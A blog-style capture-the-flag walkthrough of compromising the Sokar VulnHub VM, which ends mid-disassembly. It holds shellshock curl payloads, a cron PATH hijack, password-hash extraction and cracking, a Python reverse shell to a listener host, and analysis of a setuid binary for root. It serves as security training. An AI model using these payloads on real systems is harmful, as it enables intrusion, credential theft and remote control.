John Pierce

. SLAE, Security+

Hacking the Sokar challenge VM from Vulnhub

Thanks to rasta_mouse and VulnHub for a cool VM.  The following are my notes from working through the challenge.  
 
SokarNotes.txt
 
Loaded up the VM and found its IP.  Start.
 
nmap -n -r -v -T5 -sT 192.168.56.101 -p 1-65535
 
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-23 10:46 CST
Initiating ARP Ping Scan at 10:46
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 10:46, 0.20s elapsed (1 total hosts)
Initiating Connect Scan at 10:46
Scanning 192.168.56.101 [65535 ports]
Discovered open port 591/tcp on 192.168.56.101
Connect Scan Timing: About 36.33% done; ETC: 10:47 (0:00:54 remaining)
Completed Connect Scan at 10:47, 58.29s elapsed (65535 total ports)
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
Not shown: 65534 filtered ports
PORT    STATE SERVICE
591/tcp open  http-alt
MAC Address: 08:00:27:F2:40:DB (Cadmus Computer Systems)
 
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 58.57 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)
 
 
So, there's an http server running at port 591.  UDP scan showed nothing.  Surfed there and got:
 
<pre>
Sat Jan 23 16:51:07 GMT 2016
16:51:07 up 13 min, 0 users, load average: 0.00, 0.00, 0.00
<br />
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State      
tcp        0      0 :::591                      :::*                        LISTEN      
tcp        0      0 ::ffff:192.168.56.101:591   ::ffff:192.168.56.102:60948 TIME_WAIT   
tcp        0      0 ::ffff:192.168.56.101:591   ::ffff:192.168.56.102:60950 TIME_WAIT   
udp        0      0 0.0.0.0:68                  0.0.0.0:*                               
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  4      [ ]         DGRAM                    8487   /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     7174   @/com/ubuntu/upstart
unix  2      [ ]         DGRAM                    7317   @/org/kernel/udev/udevd
unix  2      [ ]         DGRAM                    9046   
unix  2      [ ]         DGRAM                    8667   
unix  3      [ ]         DGRAM                    7333   
unix  3      [ ]         DGRAM                    7332   
 
Linux 2.6.32-504.1.3.el6.x86_64 (sokar) 01/23/2016 _x86_64_ (1 CPU)
 
avg-cpu:  %user   %nice %system %iowait  %steal   %idle
           0.05    0.00    1.15    0.09    0.00   98.71
 
Device:            tps   Blk_read/s   Blk_wrtn/s   Blk_read   Blk_wrtn
sda               2.20        79.74         6.44      64994       5248
sdb               0.42         3.31         0.00       2700          0
 
</pre>
 
Not sure there's anything of value there other than kernel.
 
nikto -host 192.168.56.101 -port 591
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        591
+ Start Time:         2016-01-23 11:22:36 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ Server leaks inodes via ETags, header found with file /, inode: 36625, size: 244, mtime: Sat Nov 15 06:06:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8352 requests: 5 error(s) and 9 item(s) reported on remote host
+ End Time:           2016-01-23 11:24:38 (GMT-6) (122 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
 
Apache is a bit out of date.  Other items benign except maybe TRACE, per Nikto.  Maybe Apache is old enough for shellshock.
 
*********************************
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/whoami)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
apache
----------
curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /home)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 8
drwx------  2 apophis apophis 4096 Jan  2  2015 apophis
drwxrwxrwx. 2 bynarr  bynarr  4096 Jan 27  2015 bynarr
.
.
.
< removed remaining web page data >
----------
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /home/bynarr)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 16
-rwxr-xr-x 1 root root   368 Jan 27  2015 lime
-rw------- 1 root root 10728 Nov 13  2014 lime.ko
 
----------
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/ls -al /home/bynarr)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 36
drwxrwxrwx. 2 bynarr bynarr  4096 Jan 27  2015 .
drwxr-xr-x. 4 root   root    4096 Dec 30  2014 ..
-rw-------. 1 bynarr bynarr     0 Jan 27  2015 .bash_history
-rw-r--r--. 1 bynarr bynarr    18 Feb 21  2013 .bash_logout
-rw-r--r--. 1 bynarr bynarr   178 Nov 12  2014 .bash_profile
-rw-r--r--. 1 bynarr bynarr   124 Feb 21  2013 .bashrc
-rwxr-xr-x  1 root   root     368 Jan 27  2015 lime
-rw-------  1 root   root   10728 Nov 13  2014 lime.ko
----------
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /etc/group)\n\n"' 192.168.56.101:591/cgi-bin/cat |grep bynarr
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2032    0  2032    0     0   144k      0 --:--:-- --:--:-- --:--:--  152k
forensic:x:500:bynarr
bynarr:x:501:
 
 
Take a look at lime and lime.ko:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/file /home/bynarr/lime*)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
/home/bynarr/lime:    Bourne-Again shell script text executable
/home/bynarr/lime.ko: regular file, no read permission
 
lime looks interesting:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/bynarr/lime)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
#!/bin/bash
echo """
==========================
Linux Memory Extractorator
==========================
"
echo "LKM, add or remove?"
echo -en "> "
 
read -e input
 
if [ $input == "add" ]; then
 
/sbin/insmod /home/bynarr/lime.ko "path=/tmp/ram format=raw"
 
elif [ $input == "remove" ]; then
 
/sbin/rmmod lime
 
else
 
echo "Invalid input, burn in the fires of Netu!"
 
fi
 
So, experimenting:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/home/bynarr/lime add)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
 
==========================
Linux Memory Extractorator
==========================
 
LKM, add or remove?
> Invalid input, burn in the fires of Netu!
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/home/bynarr/lime)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
 
==========================
Linux Memory Extractorator
==========================
 
LKM, add or remove?
> Invalid input, burn in the fires of Netu!
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/echo add |/home/bynarr/lime)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
 
==========================
Linux Memory Extractorator
==========================
 
LKM, add or remove?
 
-------------
So, we have a winner using echo.  What does it do?
 
I looked at the source to lime and found it's creating a file in the /tmp/ram directory.  The file is not there.  It's failing because insmod must be run as root.   
 
 
Taking another approach, I decided to look at the overall file system and see what's available to bynarr.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/find / -user bynarr)\n\n"' 192.168.56.101:591/cgi-bin/cat |grep -v Permission |grep -v proc
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  7774    0  7774    0     0  45208      0 --:--:-- --:--:-- --:--:-- 45461
 
/home/bynarr
/home/bynarr/.bash_logout
/home/bynarr/.bashrc
/home/bynarr/.bash_profile
/home/bynarr/temp
/home/bynarr/.bash_history
/tmp/stats
/var/spool/mail/bynarr
 
Content-type: text/html
 
So, the regular stuff with a highlight on /tmp/stats and /var/spool/mail/bynarr
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/ls -al /var/spool/mail)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 12
drwxrwxr-x. 2 root    mail 4096 Dec 30  2014 .
drwxr-xr-x. 8 root    root 4096 Nov 12  2014 ..
-rw-rw----  1 apophis mail    0 Dec 30  2014 apophis
-rw-rw-r--. 1 bynarr  mail  551 Dec 30  2014 bynarr
 
I can only look at bynarr due to permissions, but there's nothing else out there anyway.  Here goes:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /var/spool/mail/bynarr)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
Return-Path: <root@sokar>
Delivered-To: bynarr@localhost
Received:  from root by localhost
Date: Thu, 13 Nov 2014 22:04:31 +0100
Subject: Welcome
 
Dear Bynarr.  Welcome to Sokar Inc. Forensic Development Team.
A user account has been setup for you.
 
UID 500 (bynarr)
GID 500 (bynarr)
    501 (forensic)
 
Password 'fruity'.  Please change this ASAP.
Should you require, you've been granted outbound ephemeral port access on 51242, to transfer non-sensitive forensic dumps out for analysis.
 
All the best in your new role!
 
  -Sokar-
 
This looks promising.  I can create a session on port 51242 and my username and password are bynarr and fruity.
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/find / -name nc)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
/usr/bin/nc
 
Kept getting errors with netcat, no -e or -c options.  Ran the following to see what was up:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/nc -h 2>/tmp/john.txt)\n\n"' 192.168.56.101:591/cgi-bin/cat
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /tmp/john.txt)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
 [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
 [-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
.
.
.
 
So, there's no command option (-e or -c) in this nc version.  The only services I see running are on ports 591tcp and 68udp.  68udp is bootpc which is unresponsive when I try to connect.
 
So, nothing is working.  Start over.  I need to be able to run something sudo via command line logged in as bynarr.
 
I saw python when I was looking around.
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/python -V 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
Python 2.6.6
 
 
What modules are available?
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/pydoc modules 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
 
Please wait a moment while I gather a list of all available modules...
 
BaseHTTPServer      bisect              inspect             sgmllib
Bastion             bsddb               io                  sha
CDROM               bz2                 itertools           shelve
.
.
.
base64              imghdr              runpy               zlib
bdb                 imp                 sched               
binascii            imputil             select              
binhex              iniparse            sets                
 
Enter any module name to get more help.  Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
 
There's a full complement it looks like.
 
I have to run a listener as bynarr but there's no service that allows login.  There is a cron job running, though.  /tmp/stats is owned by bynarr and gets frequent updates.  It looks like iostat output.  Is there write access to anywhere in the path?  Can't look at his environment while logged in as apache.  Look at the configs found earlier.
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/bynarr/.bash_profile 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
# .bash_profile
 
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
 
# User specific environment and startup programs
 
PATH=.:$PATH:$HOME/bin
 
export PATH
 
Create iostat in the path.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/echo \#\!\/bin\/bash > /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(echo sudo \/home\/bynarr\/lime add >> /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
#!/bin/bash
sudo /home/bynarr/lime add
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/chmod +x /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
-rwxr-xr-x 1 apache apache 34 Jan 24 10:40 /home/bynarr/iostat
 
Now to see if it worked:
 
 curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /tmp 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 261704
-rw-r--r-- 1 apache apache        42 Jan 24 01:23 john.txt
-r--r--r-- 1 root   root   267971584 Jan 24 15:23 ram
-rw-rw-r-- 1 bynarr bynarr      1040 Jan 24 15:28 stats
 
I'll do a strings and save grep to see if apophis shows up.  I know I'll need to log in as him at some point.
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/usr/bin/strings /tmp/ram| /bin/grep apophis 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
apophis
apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::
apophis
apophis.
apophis
apophis:x:501:502::/home/apophis:/bin/bash
apophis:x:502:
 
Let's try the same with root.  Killed a lot of data.  This and the fact that it worked confirm bynarr can sudo "lime add" without a password.  I removed a lot of lines that were uninteresting.  
 
home/bynarr ; USER=root ; COMMAND=./lime add
## the root user, without needing the root password.
 
And I may as well kill the memory dumps for cron:
 
curl -A '() { :;}; echo -en "\n\n$(/bin/rm /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /home/bynarr 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 16
-rwxr-xr-x 1 root root   368 Jan 27  2015 lime
-rw------- 1 root root 10728 Nov 13  2014 lime.ko
 
Now use john to crack the password.
 
john apophishash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
overdrive        (apophis)
1g 0:00:00:51 DONE (2016-01-24 09:54) 0.01954g/s 720.4p/s 720.4c/s 720.4C/s 4444..holaz
Use the "--show" option to display all of the cracked passwords reliably
Session completed
 
Now we've got two accounts with passwords and a hole in the firewall:
 
bynarr fruity 51242 tcp
apophis overdrive
 
All we need is a shell, and to gain root.
 
I found this at pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 
Edited:
 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",51242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 
Echo that into iostat and see if it will give me a shell as bynarr.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/echo \#\!\/usr/\bin\/python > /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
curl -A '() { :;}; echo -en "\n\n$(/bin/echo import socket,subprocess,os\;s=socket.socket\(socket.AF_INET,socket.SOCK_STREAM\)\;s.connect\(\(\"192.168.56.102\",51242\)\)\;os.dup2\(s.fileno\(\),0\)\; os.dup2\(s.fileno\(\),1\)\; os.dup2\(s.fileno\(\),2\)\;p=subprocess.call\(\[\"\/bin\/sh\",\"-i\"\]\)\; >> /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
And check the results:
 
curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat |head
 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1662    0  1662    0     0   106k      0 --:--:-- --:--:-- --:--:--  108k
 
#!/usr/bin/python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",51242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
 
Content-type: text/html
 
<pre>
 
Make it executable, set up a listener and see if it works.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/chmod 777 /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat |head
 
root@kali:~/Documents/sokar_hack# nc -nlvp 51242
listening on [any] 51242 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 41375
sh: no job control in this shell
sh-4.1$ 
 
I've got a shell as bynarr.
 
id
id
uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)
sh-4.1$ su apophis
su apophis
standard in must be a tty
sh-4.1$  /usr/bin/python -c 'import pty;pty.spawn("/bin/sh")'
/usr/bin/python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.1$ su apophis
su apophis
Password: overdrive
 
[apophis@sokar ~]$ find / -user apophis 2>/dev/null|grep -v proc
find / -user apophis 2>/dev/null|grep -v proc
/mnt
/home/apophis
/home/apophis/.bash_logout
/home/apophis/.bashrc
/home/apophis/.bash_profile
/home/apophis/.bash_history
/var/spool/mail/apophis
 
Why would apophis own mnt?  See what suid files are out there.
 
[apophis@sokar ~]$ find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt
<perm -2000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt                 
[apophis@sokar ~]$ cat suidfiles.txt
cat suidfiles.txt
.
.
-rwsr-xr-x. 1 root 224912 Feb 22  2013 /usr/libexec/openssh/ssh-keysign
-rws--x--x. 1 root 14280 Oct 15  2014 /usr/libexec/pt_chown
-rwsr-sr-x 1 root 8430 Jan  2  2015 /home/apophis/build
.
.
.
 
So, /home/apophis/build runs suid.  See if I can figure out what it's doing.
 
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
ssh: Could not resolve hostname sokar-dev: Temporary failure in name resolution
fatal: Could not read from remote repository.
 
Please make sure you have the correct access rights
and the repository exists.
 
Tried it again to see about overflow:
 
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
*** buffer overflow detected ***: ./build terminated
======= Backtrace: =========
/lib64/libc.so.6(__fortify_fail+0x37)[0x7f61646b9697]
/lib64/libc.so.6(+0x100580)[0x7f61646b7580]
.
.
.
7f616622e000-7f616624f000 rwxp 00000000 00:00 0                          [heap]
7fffdd358000-7fffdd36d000 rwxp 00000000 00:00 0                          [stack]
7fffdd3ff000-7fffdd400000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted
[apophis@sokar ~]$base64 build > build.b64
[apophis@sokar ~]chmod 777 build.b64
[apophis@sokar home]$ ls -l
ls -l
total 8
drwx------  2 apophis apophis 4096 Jan 24 18:22 apophis
drwxrwxrwx. 2 bynarr  bynarr  4096 Jan 24 17:22 bynarr
[apophis@sokar home]$ chmod 777 apophis
chmod 777 apophis
 
So, I wanted to download the file and take a look locally.  Decided to write it out base64 and just cat to a file.  From Kali,
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/apophis/build.b64 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat > build.b64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 12561    0 12561    0     0   972k      0 --:--:-- --:--:-- --:--:-- 1022k
 
Clean up the file a bit, decode and verify:
 
root@kali:~/Documents/sokar_hack# vim build.b64 
root@kali:~/Documents/sokar_hack# base64 -d build.b64 > build
root@kali:~/Documents/sokar_hack# ls -l
total 28
-rw-r--r-- 1 root root   126 Jan 24 09:53 apophishash
-rw-r--r-- 1 root root  8430 Jan 24 12:29 build
-rw-r--r-- 1 root root 11388 Jan 24 12:29 build.b64
root@kali:~/Documents/sokar_hack# md5sum build
9f6c5940f3960b869e23e43fd729fc25  build
root@kali:~/Documents/sokar_hack# 
 
[apophis@sokar ~]$ md5sum build
md5sum build
9f6c5940f3960b869e23e43fd729fc25  build
 
So, our file transfered fine.
 
Running it in gdb with a 'Y' answer, we get:
 
Build? (Y/N) Y
Detaching after fork from child process 1588.
Cloning into '/mnt/secret-project'...
ssh: Could not resolve hostname sokar-dev: Temporary failure in name resolution
fatal: Could not read from remote repository.
 
Please make sure you have the correct access rights
and the repository exists.
 
----------
If I put anything more than one character response, I get an abort due to a stack check upon return from the __gets_chk at 0x9d4.  Need to look at the canary on the stack and see if it's static so I can feed it into the string, fooling the gets_chk function.  
----------
[apophis@sokar ~]$ objdump -d build -M intel
objdump -d build -M intel
 
build:     file format elf64-x86-64
 
 
Disassembly of section .init:
 
<skip some stuff>
 
00000000000008ac <encryptDecrypt>:   ; xor characters with 0x49 ('I')
 8ac: 48 89 fa             mov    rdx,rdi
 8af: 41 b9 00 00 00 00     mov    r9d,0x0
 8b5: 49 c7 c3 ff ff ff ff mov    r11,0xffffffffffffffff
 8bc: 49 89 fa             mov    r10,rdi
 8bf: b8 00 00 00 00       mov    eax,0x0
 8c4: eb 10                 jmp    8d6 <encryptDecrypt+0x2a>
 8c6: 42 0f b6 0c 02       movzx  ecx,BYTE PTR [rdx+r8*1]
 8cb: 83 f1 49             xor    ecx,0x49
 8ce: 42 88 0c 06           mov    BYTE PTR [rsi+r8*1],cl
 8d2: 41 83 c1 01           add    r9d,0x1
 8d6: 4d 63 c1             movsxd r8,r9d
 8d9: 4c 89 d9             mov    rcx,r11
 8dc: 4c 89 d7             mov    rdi,r10
 8df: f2 ae                 repnz scas al,BYTE PTR es:[rdi]
 8e1: 48 f7 d1             not    rcx
 8e4: 48 83 e9 01           sub    rcx,0x1
 8e8: 49 39 c8             cmp    r8,rcx
 8eb: 72 d9                 jb     8c6 <encryptDecrypt+0x1a>
 8ed: f3 c3                 repz ret 
 
00000000000008ef <main>:
 8ef: 55                   push   rbp
 8f0: 48 89 e5             mov    rbp,rsp
 8f3: 41 54                 push   r12
 8f5: 53                   push   rbx
 8f6: 48 83 c4 80           add    rsp,0xffffffffffffff80
 8fa: 64 48 8b 04 25 28 00 mov    rax,QWORD PTR fs:0x28
 901: 00 00 
 903: 48 89 45 e8           mov    QWORD PTR [rbp-0x18],rax
 907: 31 c0                 xor    eax,eax
 ---------------------------
 Build a big string between rbp-0x90 and rbp-0x40
 ';:<f\' +f= .f&%*i:i,\'fs!:&&;f&:\t=d;("s?,-&&;f,:f==,;*&;9d=*,#\'$fi,:f==,;*&;9d=*,#'
 ---------------------------
 909: c7 85 70 ff ff ff 66 mov    DWORD PTR [rbp-0x90],0x3b3a3c66
 910: 3c 3a 3b 
 913: c7 85 74 ff ff ff 66 mov    DWORD PTR [rbp-0x8c],0x27202b66
 91a: 2b 20 27 
 91d: c7 85 78 ff ff ff 66 mov    DWORD PTR [rbp-0x88],0x3d202e66
 924: 2e 20 3d 
 927: c7 85 7c ff ff ff 69 mov    DWORD PTR [rbp-0x84],0x26252a69
 92e: 2a 25 26 
 931: c7 45 80 27 2c 69 3a mov    DWORD PTR [rbp-0x80],0x3a692c27
 938: c7 45 84 3a 21 73 66 mov    DWORD PTR [rbp-0x7c],0x6673213a
 93f: c7 45 88 66 3b 26 26 mov    DWORD PTR [rbp-0x78],0x26263b66
 946: c7 45 8c 3d 09 3a 26 mov    DWORD PTR [rbp-0x74],0x263a093d
 94d: c7 45 90 22 28 3b 64 mov    DWORD PTR [rbp-0x70],0x643b2822
 954: c7 45 94 2d 2c 3f 73 mov    DWORD PTR [rbp-0x6c],0x733f2c2d
 95b: c7 45 98 66 3b 26 26 mov    DWORD PTR [rbp-0x68],0x26263b66
 962: c7 45 9c 3d 66 3a 2c mov    DWORD PTR [rbp-0x64],0x2c3a663d
 969: c7 45 a0 2a 3b 2c 3d mov    DWORD PTR [rbp-0x60],0x3d2c3b2a
 970: c7 45 a4 64 39 3b 26 mov    DWORD PTR [rbp-0x5c],0x263b3964
 977: c7 45 a8 23 2c 2a 3d mov    DWORD PTR [rbp-0x58],0x3d2a2c23
 97e: c7 45 ac 69 66 24 27 mov    DWORD PTR [rbp-0x54],0x27246669
 985: c7 45 b0 3d 66 3a 2c mov    DWORD PTR [rbp-0x50],0x2c3a663d
 98c: c7 45 b4 2a 3b 2c 3d mov    DWORD PTR [rbp-0x4c],0x3d2c3b2a
 993: c7 45 b8 64 39 3b 26 mov    DWORD PTR [rbp-0x48],0x263b3964
 99a: c7 45 bc 23 2c 2a 3d mov    DWORD PTR [rbp-0x44],0x3d2a2c23
 9a1: 66 c7 45 c0 66 00     mov    WORD PTR [rbp-0x40],0x66
  9a7: 0f b7 05 d3 01 00 00 movzx  eax,WORD PTR [rip+0x1d3]        # b81 <_IO_stdin_used+0x19>
 9ae: 66 89 45 d0           mov    WORD PTR [rbp-0x30],ax
 9b2: 48 8d 35 b3 01 00 00 lea    rsi,[rip+0x1b3]        # b6c <_IO_stdin_used+0x4>
 9b9: bf 01 00 00 00       mov    edi,0x1
 9be: b8 00 00 00 00       mov    eax,0x0
 ----------
 Break here and see what's in x/s $rbp-0x90, $rsi, 
 (gdb) x/s $rbp-0x90
x/s $rbp-0x90
0x7ffff7ff82e0: "f<:;f+ 'f. =i*%&',i::!sff;&&=\t:&\"(;d-,?sf;&&=f:,*;,=d9;&#,*=if$'=f:,*;,=d9;&#,*=f"
 
This looks like our encoded string.
 x/s $rsi
x/s $rsi
0x7f6625d7bb6c: "Build? (Y/N) "
 
 
 9c3: e8 68 fd ff ff       call   730 <__printf_chk@plt>
 9c8: 48 8d 5d e0           lea    rbx,[rbp-0x20]
 9cc: be 02 00 00 00       mov    esi,0x2
 9d1: 48 89 df             mov    rdi,rbx
 9d4: e8 87 fd ff ff       call   760 <__gets_chk@plt> ; accept string with stack protection
 9d9: 48 8d 75 d0           lea    rsi,[rbp-0x30]
 9dd: 48 89 df             mov    rdi,rbx ; store the address of the response string
 9e0: e8 ab fd ff ff       call   790 <strcmp@plt
 9e5: 85 c0                 test   eax,eax ; is the response 'Y'
 9e7: 75 5e                 jne    a47 <main+0x158>   ; answer 'N'
 9e9: 49 89 e4             mov    r12,rsp ; save the stack pointer
 9ec: 48 8d 95 70 ff ff ff lea    rdx,[rbp-0x90] ; point to our string
 9f3: 48 89 d7             mov    rdi,rdx
 9f6: 48 c7 c1 ff ff ff ff mov    rcx,0xffffffffffffffff
 9fd: f2 ae                 repnz scas al,BYTE PTR es:[rdi] 
 9ff: 48 f7 d1             not    rcx
 a02: 48 83 c1 1d           add    rcx,0x1d
 a06: 48 83 e1 f0           and    rcx,0xfffffffffffffff0
 a0a: 48 29 cc             sub    rsp,rcx
 a0d: 48 8d 5c 24 0f       lea    rbx,[rsp+0xf]
 a12: 48 83 e3 f0           and    rbx,0xfffffffffffffff0
 a16: 48 89 de             mov    rsi,rbx
 a19: 48 89 d7             mov    rdi,rdx
 a1c: e8 8b fe ff ff       call   8ac <encryptDecrypt>     ; and decrypt the string (XOR w 0x49)
 a21: be 00 00 00 00       mov    esi,0x0
 a26: bf 00 00 00 00       mov    edi,0x0
 a2b: b8 00 00 00 00       mov    eax,0x0 ; suid to root
 a30: e8 6b fd ff ff       call   7a0 <setreuid@plt
----------
If I can write over this with the correct command, namely /bin/sh, I'm golden
----------
 a35: 48 89 df             mov    rdi,rbx ; command:"/usr/bin/git clone ssh://root@sokar-dev:/root/secret-project /mnt/secret-project/"
 a38: b8 00 00 00 00       mov    eax,0x0          ; system call 
 a3d: e8 0e fd ff ff       call   750 <system@plt>
 a42: 4c 89 e4             mov    rsp,r12
 a45: eb 16                 jmp    a5d <main+0x16e>
 a47: 48 8d 35 2c 01 00 00 lea    rsi,[rip+0x12c]        # b7a <_IO_stdin_used+0x12>
